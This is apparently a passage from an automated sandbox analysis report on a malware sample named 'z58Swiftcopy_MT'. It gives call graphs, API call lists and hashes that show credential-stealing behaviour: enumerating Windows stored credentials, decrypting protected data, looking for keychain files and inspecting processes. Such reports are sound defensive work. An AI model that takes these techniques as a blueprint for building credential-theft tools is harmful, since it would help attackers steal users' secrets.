39279->39270 39282 404475 FreeLibrary 39279->39282 39281 40444f GetProcAddress 39280->39281 39281->39279 39283 404460 39281->39283 39282->39270 39283->39279 39285 4135f6 39284->39285 39286 4135eb FreeLibrary 39284->39286 39285->38543 39286->39285 39288 4449c4 39287->39288 39289 444a52 39287->39289 39290 40b2cc 27 API calls 39288->39290 39289->38560 39289->38561 39291 4449cb 39290->39291 39292 40a804 8 API calls 39291->39292 39293 4449d1 39292->39293 39294 40b273 27 API calls 39293->39294 39295 4449dc GetProcAddress 39294->39295 39296 40b273 27 API calls 39295->39296 39297 4449f3 GetProcAddress 39296->39297 39298 40b273 27 API calls 39297->39298 39299 444a04 GetProcAddress 39298->39299 39308->38571 39309->38571 39310->38571 39311->38571 39312->38562 39314 403a29 39313->39314 39328 403bed memset memset 39314->39328 39316 403ae7 39341 40b1ab free free 39316->39341 39318 403a3f memset 39322 403a2f 39318->39322 39319 403aef 39319->38579 39320 40a8d0 7 API calls 39320->39322 39321 409d1f 6 API calls 39321->39322 39322->39316 39322->39318 39322->39320 39322->39321 39323 409b98 GetFileAttributesW 39322->39323 39323->39322 39325 40a051 GetFileTime CloseHandle 39324->39325 39326 4039ca CompareFileTime 39324->39326 39325->39326 39326->38579 39327->38578 39329 414c2e 17 API calls 39328->39329 39330 403c38 39329->39330 39331 409719 2 API calls 39330->39331 39332 403c3f wcscat 39331->39332 39333 414c2e 17 API calls 39332->39333 39334 403c61 39333->39334 39335 409719 2 API calls 39334->39335 39336 403c68 wcscat 39335->39336 39342 403af5 39336->39342 39339 403af5 20 API calls 39340 403c95 39339->39340 39340->39322 39341->39319 39343 403b02 39342->39343 39344 40ae18 9 API calls 39343->39344 39352 403b37 39344->39352 39345 403bdb 39346 40aebe FindClose 39345->39346 39347 403be6 39346->39347 39347->39339 39348 40ae18 9 API calls 39348->39352 39349 40ae51 9 API calls 39349->39352 39350 40add4 wcscmp wcscmp 39350->39352 39351 40aebe FindClose 39351->39352 39352->39345 39352->39348 
39352->39349 39352->39350 39352->39351 39353 40a8d0 7 API calls 39352->39353 39353->39352 39355 409d1f 6 API calls 39354->39355 39356 404190 39355->39356 39369 409b98 GetFileAttributesW 39356->39369 39358 40419c 39359 4041a7 6 API calls 39358->39359 39360 40435c 39358->39360 39361 40424f 39359->39361 39360->38605 39361->39360 39363 40425e memset 39361->39363 39365 409d1f 6 API calls 39361->39365 39366 40a8ab 9 API calls 39361->39366 39370 414842 39361->39370 39363->39361 39364 404296 wcscpy 39363->39364 39364->39361 39365->39361 39367 4042b6 memset memset _snwprintf wcscpy 39366->39367 39367->39361 39368->38603 39369->39358 39373 41443e 39370->39373 39372 414866 39372->39361 39374 41444b 39373->39374 39375 414451 39374->39375 39376 4144a3 GetPrivateProfileStringW 39374->39376 39377 414491 39375->39377 39378 414455 wcschr 39375->39378 39376->39372 39380 414495 WritePrivateProfileStringW 39377->39380 39378->39377 39379 414463 _snwprintf 39378->39379 39379->39380 39380->39372 39381->38609 39383 40b2cc 27 API calls 39382->39383 39384 409615 39383->39384 39385 409d1f 6 API calls 39384->39385 39386 409625 39385->39386 39411 409b98 GetFileAttributesW 39386->39411 39388 409634 39389 409648 39388->39389 39412 4091b8 memset 39388->39412 39391 40b2cc 27 API calls 39389->39391 39394 408801 39389->39394 39392 40965d 39391->39392 39393 409d1f 6 API calls 39392->39393 39395 40966d 39393->39395 39394->38612 39394->38639 39464 409b98 GetFileAttributesW 39395->39464 39397 40967c 39397->39394 39398 409681 39397->39398 39465 409529 72 API calls 39398->39465 39400 409690 39400->39394 39411->39388 39466 40a6e6 WideCharToMultiByte 39412->39466 39414 409202 39467 444432 39414->39467 39417 40b273 27 API calls 39418 409236 39417->39418 39513 438552 39418->39513 39444 40951d 39444->39389 39464->39397 39465->39400 39466->39414 39468 4438b5 11 API calls 39467->39468 39469 44444c 39468->39469 39470 409215 39469->39470 39563 415a6d 39469->39563 39470->39417 39470->39444 39472 4442e6 11 API calls 
39474 44469e 39472->39474 39473 444486 39475 4444b9 memcpy 39473->39475 39512 4444a4 39473->39512 39474->39470 39477 443d90 111 API calls 39474->39477 39567 415258 39475->39567 39477->39470 39478 444524 39479 444541 39478->39479 39480 44452a 39478->39480 39570 444316 39479->39570 39481 416935 16 API calls 39480->39481 39481->39512 39512->39472 39684 438460 39513->39684 39564 415a77 39563->39564 39565 415a8d 39564->39565 39566 415a7e memset 39564->39566 39565->39473 39566->39565 39568 4438b5 11 API calls 39567->39568 39569 41525d 39568->39569 39569->39478 39571 444328 39570->39571 39696 41703f 39684->39696 39686 43847a 39687 43848a 39686->39687 39688 43847e 39686->39688 39703 438270 39687->39703 39733 4446ea 11 API calls 39688->39733 39695 438488 39697 417044 39696->39697 39698 41705c 39696->39698 39700 416760 11 API calls 39697->39700 39702 417055 39697->39702 39699 417075 39698->39699 39701 41707a 11 API calls 39698->39701 39699->39686 39700->39702 39701->39697 39702->39686 39704 415a91 memset 39703->39704 39733->39695 39834 413f4f 39807->39834 39810 413f37 K32GetModuleFileNameExW 39811 413f4a 39810->39811 39811->38672 39813 413969 wcscpy 39812->39813 39814 41396c wcschr 39812->39814 39824 413a3a 39813->39824 39814->39813 39816 41398e 39814->39816 39839 4097f7 wcslen wcslen _memicmp 39816->39839 39818 41399a 39819 4139a4 memset 39818->39819 39820 4139e6 39818->39820 39840 409dd5 GetWindowsDirectoryW wcscpy 39819->39840 39822 413a31 wcscpy 39820->39822 39823 4139ec memset 39820->39823 39822->39824 39841 409dd5 GetWindowsDirectoryW wcscpy 39823->39841 39824->38672 39825 4139c9 wcscpy wcscat 39825->39824 39827 413a11 memcpy wcscat 39827->39824 39829 413cb0 GetModuleHandleW 39828->39829 39830 413cda 39828->39830 39829->39830 39833 413cbf GetProcAddress 39829->39833 39831 413ce3 GetProcessTimes 39830->39831 39832 413cf6 39830->39832 39831->38674 39832->38674 39833->39830 39835 413f2f 39834->39835 39836 413f54 39834->39836 39835->39810 39835->39811 39837 40a804 8 API 

Control-flow Graph

[Control-flow graph of the function at 40dd85 (legend: Executed / Not Executed); graph not reproduced.]
APIs
• memset.MSVCRT ref: 0040DDAD
  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
• CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
  • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
  • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
  • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
• NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
• CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
• GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
• _wcsicmp.MSVCRT ref: 0040DEB2
• _wcsicmp.MSVCRT ref: 0040DEC5
• _wcsicmp.MSVCRT ref: 0040DED8
• OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
• GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
• DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
• memset.MSVCRT ref: 0040DF5F
• CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
• _wcsicmp.MSVCRT ref: 0040DFB2
• CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
Strings
Memory Dump Source
• Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
Similarity
• API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
• String ID: dllhost.exe$taskhost.exe$taskhostex.exe
• API String ID: 708747863-3398334509

Control-flow Graph

[Control-flow graph of the function at 413d4c (legend: Executed / Not Executed); graph not reproduced.]
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                      • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,?,?), ref: 00413D6A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413D7F
                                                                                                                                                                                                                                      • Process32FirstW.KERNEL32(00000000,?), ref: 00413D9B
                                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,?,?,?,?), ref: 00413DE0
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413E07
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,00000000,?), ref: 00413E3C
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,QueryFullProcessImageNameW), ref: 00413E56
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,?,?,00000000,?), ref: 00413EA8
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00413EC1
                                                                                                                                                                                                                                      • Process32NextW.KERNEL32(00000000,0000022C), ref: 00413F0A
                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,00000000,0000022C), ref: 00413F1A
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Handle$CloseProcess32freememset$AddressCreateFirstModuleNextOpenProcProcessSnapshotToolhelp32
                                                                                                                                                                                                                                      • String ID: QueryFullProcessImageNameW$kernel32.dll
                                                                                                                                                                                                                                      • API String ID: 1344430650-1740548384
                                                                                                                                                                                                                                      • Opcode ID: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                                                                      • Instruction ID: a891ebf292d3308fa7e32b9fbc5d589fb36fb38cf1b6cbdc37d41f3709903cdc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7edb3ed668d67efb41ddc3a99b3dcc2d3fa5e99a9f713289acc2c2ca3bb66fb8
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4518FB2C00218ABDB10DF5ACC84ADEF7B9AF95305F1041ABE509A3251D7795F84CFA9

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      control_flow_graph 754 40b58d-40b59e 755 40b5a4-40b5c0 GetModuleHandleW FindResourceW 754->755 756 40b62e-40b632 754->756 757 40b5c2-40b5ce LoadResource 755->757 758 40b5e7 755->758 757->758 759 40b5d0-40b5e5 SizeofResource LockResource 757->759 760 40b5e9-40b5eb 758->760 759->760 760->756 761 40b5ed-40b5ef 760->761 761->756 762 40b5f1-40b629 call 40afcf memcpy call 40b4d3 call 40b3c1 call 40b04b 761->762 762->756
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?, AE,?,?,00411B78,?,General,?,00000000,00000001), ref: 0040B5A5
                                                                                                                                                                                                                                      • FindResourceW.KERNELBASE(00000000,00000032,BIN), ref: 0040B5B6
                                                                                                                                                                                                                                      • LoadResource.KERNEL32(00000000,00000000), ref: 0040B5C4
                                                                                                                                                                                                                                      • SizeofResource.KERNEL32(?,00000000), ref: 0040B5D4
                                                                                                                                                                                                                                      • LockResource.KERNEL32(00000000), ref: 0040B5DD
                                                                                                                                                                                                                                      • memcpy.MSVCRT(00000000,00000000,00000000), ref: 0040B60D
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Resource$FindHandleLoadLockModuleSizeofmemcpy
                                                                                                                                                                                                                                      • String ID: AE$BIN
                                                                                                                                                                                                                                      • API String ID: 1668488027-3931574542
                                                                                                                                                                                                                                      • Opcode ID: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                                                                      • Instruction ID: e905eb6dc449d61379ecdc49350c1a2f8866219970738eecada31b95dd052af9
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34e809506899ed03cb1dc36614dfe32cef5e62f1a3b34244b0efced66f6d4593
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5E11C636C00225BBD7116BE2DC09AAFBA78FF85755F010476F81072292DB794D018BED
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,?,?,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404498
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
                                                                                                                                                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00404453
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000,00000141,?,00000000,?,004026E9,?,?,00000000,?), ref: 00404476
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Library$Load$AddressCryptDataDirectoryFreeProcSystemUnprotectmemsetwcscatwcscpy
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 767404330-0
                                                                                                                                                                                                                                      • Opcode ID: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                      • Instruction ID: e973b1bd6c29085855c002f2d91bff7161adaf38cfdf5e3d51a6561f1cc66020
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 167b13068c05feda1897cb6df0c64706ed2b4f49057c686e83d0e2c7873bd54f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D90192B1100211AAD6319FA6CC04D1BFAE9EFC0750B20883FF1D9E25A0D7B49881DB69
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE67
                                                                                                                                                                                                                                      • FindNextFileW.KERNELBASE(?,?,?,00000000,00445F58,*.*,?,00000000,?,00000104,?,?,?,?,?,00000104), ref: 0040AE83
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFind$FirstNext
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 1690352074-0
                                                                                                                                                                                                                                      • Opcode ID: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                      • Instruction ID: bc213c2af839868520f9a45b85e911a0cf9bcc257b6b56acf9ba21b23a9e6198
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 561b3503b5d493cb0f99635c99673ff26dffc0bbfdea02a94e907e6f5a7ee62d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34F0C877040B005BD761C774D8489C733D89F84320B20063EF56AD32C0EB3899098755
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0041898C
                                                                                                                                                                                                                                      • GetSystemInfo.KERNELBASE(004725C0,?,00000000,004439D6,?,00445FAE,?,?,?,?,?,?), ref: 00418995
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: InfoSystemmemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 3558857096-0
                                                                                                                                                                                                                                      • Opcode ID: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                                                                      • Instruction ID: bf8bfd662ffca2911032058da6995c9eeb4a28626cb6ee34ade21af96d3a2c90
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1cb27ac447f4cf033b6cba199a5ddcb1fdd974c12d9e405e28a5f35c0eb83b67
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0E06531A0163097F22077766C067DF25949F41395F04407BB9049A186EBAC4D8546DE
                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00406F8B
                                                                                                                                                                                                                                      • free.MSVCRT ref: 00407082
                                                                                                                                                                                                                                        • Part of subcall function 004069DF: memcpy.MSVCRT(Af@,?,?,00406A37,?,?,00000000,?,?,?,?,00406641,?), ref: 004069FB
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: free$memcpymemset
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2037443186-0
                                                                                                                                                                                                                                      • Opcode ID: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                                                                                      • Instruction ID: 420730b51c6485b03e68e59ad930d3fea23228fdda059c903cb8609e0c2e012e
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 194ffa50f1d49c66bd0eaa66e239e42f462a2f09db0f56dd66ad68c16249fa33
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54027D71D042299BDF24DF65C8846EEB7B1BF48314F1481BAE849BB381D738AE81CB55

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004455C2
                                                                                                                                                                                                                                      • wcsrchr.MSVCRT ref: 004455DA
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044570D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445725
                                                                                                                                                                                                                                        • Part of subcall function 0040C768: _wcslwr.MSVCRT ref: 0040C817
                                                                                                                                                                                                                                        • Part of subcall function 0040C768: wcslen.MSVCRT ref: 0040C82C
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: CredEnumerateW.ADVAPI32(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcslen.MSVCRT ref: 0040BE06
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: wcsncmp.MSVCRT ref: 0040BE38
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memset.MSVCRT ref: 0040BE91
                                                                                                                                                                                                                                        • Part of subcall function 0040BDB0: memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                                                                                                                                                                        • Part of subcall function 004135F7: GetProcAddress.KERNEL32(?,00000000), ref: 0041362A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044573D
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445755
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458CB
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 004458E3
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 0044596E
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A10
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445A28
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445AC6
                                                                                                                                                                                                                                        • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                                                                                                                                                                                        • Part of subcall function 00445093: GetFileSize.KERNEL32(00000000,00000000,?,00000000,00000104,00445E7E,?,?,?,?,00000104), ref: 004450AA
                                                                                                                                                                                                                                        • Part of subcall function 00445093: ??2@YAPAXI@Z.MSVCRT(0000000A,?,?,00000104), ref: 004450BE
                                                                                                                                                                                                                                        • Part of subcall function 00445093: memset.MSVCRT ref: 004450CD
                                                                                                                                                                                                                                        • Part of subcall function 00445093: ??3@YAXPAX@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,00000104), ref: 004450F0
                                                                                                                                                                                                                                        • Part of subcall function 00445093: CloseHandle.KERNEL32(00000000,?,?,00000104), ref: 004450F7
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B52
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B6A
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445C9B
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445CB3
                                                                                                                                                                                                                                      • _wcsicmp.MSVCRT ref: 00445D56
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445B82
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B71C
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: wcsrchr.MSVCRT ref: 0040B738
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B756
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: memset.MSVCRT ref: 0040B7F5
                                                                                                                                                                                                                                        • Part of subcall function 0040B6EF: CreateFileW.KERNELBASE(00445FAE,80000000,00000000,00000000,00000003,00000000,00000000,?,?), ref: 0040B80C
                                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040ADF3
                                                                                                                                                                                                                                        • Part of subcall function 0040ADD4: wcscmp.MSVCRT ref: 0040AE04
                                                                                                                                                                                                                                      • memset.MSVCRT ref: 00445986
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                                                                                                                                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000003.00000002.28481532531.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      • Associated: 00000003.00000002.28481532531.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_3_2_400000_z58Swiftcopy_MT.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: memset$wcslen$File$wcscmpwcsrchr$??2@??3@AddressAttributesCloseCreateCredEnumerateFolderHandlePathProcSizeSpecial_wcsicmp_wcslwrmemcpywcscatwcscpywcsncmp
                                                                                                                                                                                                                                      • String ID: *.*$Apple Computer\Preferences\keychain.plist
                                                                                                                                                                                                                                      • API String ID: 1963886904-3798722523
                                                                                                                                                                                                                                      • Opcode ID: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                      • Instruction ID: 0d822d17a5609fa1e1b699618fc72e24fb48bc28b5d87ede4d5502c71e25afa2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4107367e6a52814d16d978fdb1f2ed27fa2de906a3c2bdd9af1925875ae5045e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: ED4278B29005196BEB10E761DD46EDFB37CEF45358F1001ABF508A2193EB385E948B9A

                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: LoadLibraryW.KERNEL32(comctl32.dll,00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044C3
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: FreeLibrary.KERNEL32(00000000,?,00000002,?,?,?,00412785,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 004044E9
                                                                                                                                                                                                                                        • Part of subcall function 004044A4: MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001,00000000,?,00000002,?,0044688C,00000000,?,0000000A), ref: 00412799
